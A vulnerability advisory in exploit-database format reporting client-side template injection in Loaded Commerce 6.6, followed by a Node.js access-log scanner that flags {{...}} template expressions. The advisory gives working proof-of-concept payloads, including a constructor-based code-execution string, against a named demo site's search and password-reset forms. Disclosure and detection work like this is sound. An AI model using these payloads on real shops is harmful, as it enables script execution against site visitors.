# Exploit Title: Loaded Commerce 6.6 - Client-Side Template Injection (CSTI)
# Date: 03/13/2025
# Exploit Author: tmrswrr
# Vendor Homepage: https://loadedcommerce.com/
# Version: 6.6
# Tested on: https://www.softaculous.com/apps/ecommerce/Loaded_Commerce

Advanced Search:

Injecting {{7*7}} into the search parameter

https://demos1.softaculous.com/Loaded_Commerce/index.php?rt=core%2Fadvanced_search_result&keywords={{7*7}}

returns 49, confirming a template injection vulnerability.

Forgot Password:

Submitting {{constructor.constructor('alert(1)')()}} in the email field on the "Forgot Password" page

https://demos1.softaculous.com/Loaded_Commerce/index.php?rt=core/password_forgotten&action=process

triggers an alert, demonstrating client-side code execution.
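The {{7*7}} probe above is also the simplest thing a defender can hunt for in request logs. The following Node.js scanner is an added example, not part of this advisory: it parses constructed combined-format access-log lines, percent-decodes each query parameter (including double encoding) and flags any value that contains a {{ ... }} template expression. The log lines, IPs and the placeholder base host are assumptions; the keywords parameter and paths come from the PoC URLs.

```javascript
// Added example, not from the advisory: flag query parameters carrying a
// {{ ... }} template expression, the indicator used in the PoC above.
// Sample log lines are constructed; IPs and hostnames are placeholders.
const SAMPLE_LOG = [
  '10.0.0.5 - - [13/Mar/2025:10:00:00 +0000] "GET /Loaded_Commerce/index.php?rt=core%2Fadvanced_search_result&keywords=shoes HTTP/1.1" 200 5120',
  '10.0.0.9 - - [13/Mar/2025:10:00:01 +0000] "GET /Loaded_Commerce/index.php?rt=core%2Fadvanced_search_result&keywords=%7B%7B7*7%7D%7D HTTP/1.1" 200 5120',
  // Double-encoded variant: %257B decodes to %7B, which decodes to "{"
  '10.0.0.9 - - [13/Mar/2025:10:00:02 +0000] "GET /Loaded_Commerce/index.php?rt=core%2Fadvanced_search_result&keywords=%257B%257B7*7%257D%257D HTTP/1.1" 200 5120',
  // The Forgot Password case is a POST body field; a plain access log does not
  // carry it, so that path needs a body-aware source (WAF or application log).
  '10.0.0.9 - - [13/Mar/2025:10:00:03 +0000] "POST /Loaded_Commerce/index.php?rt=core/password_forgotten&action=process HTTP/1.1" 302 0',
];

// Non-greedy match for a mustache-style expression.
const TEMPLATE_EXPR = /\{\{[\s\S]+?\}\}/;

// Percent-decode repeatedly until the value stops changing (bounded), so
// double-encoded payloads are normalised before matching.
function decodeFully(value, maxRounds = 3) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(current); } catch (_) { break; } // malformed escape
    if (next === current) break;
    current = next;
  }
  return current;
}

// Parse the request line of one access-log entry and return
// { method, path, hits: [{ param, value }] }, or null when nothing matched.
function findTemplateInjection(line) {
  const m = line.match(/"(GET|POST) (\S+) HTTP\//);
  if (!m) return null;
  const url = new URL(m[2], "http://placeholder.invalid"); // base host is a placeholder
  const hits = [];
  for (const [param, raw] of url.searchParams) {
    const value = decodeFully(raw);
    if (TEMPLATE_EXPR.test(value)) hits.push({ param, value });
  }
  return hits.length ? { method: m[1], path: url.pathname, hits } : null;
}

function scanLog(lines) {
  return lines.map(findTemplateInjection).filter((r) => r !== null);
}

console.log(JSON.stringify(scanLog(SAMPLE_LOG), null, 2));
```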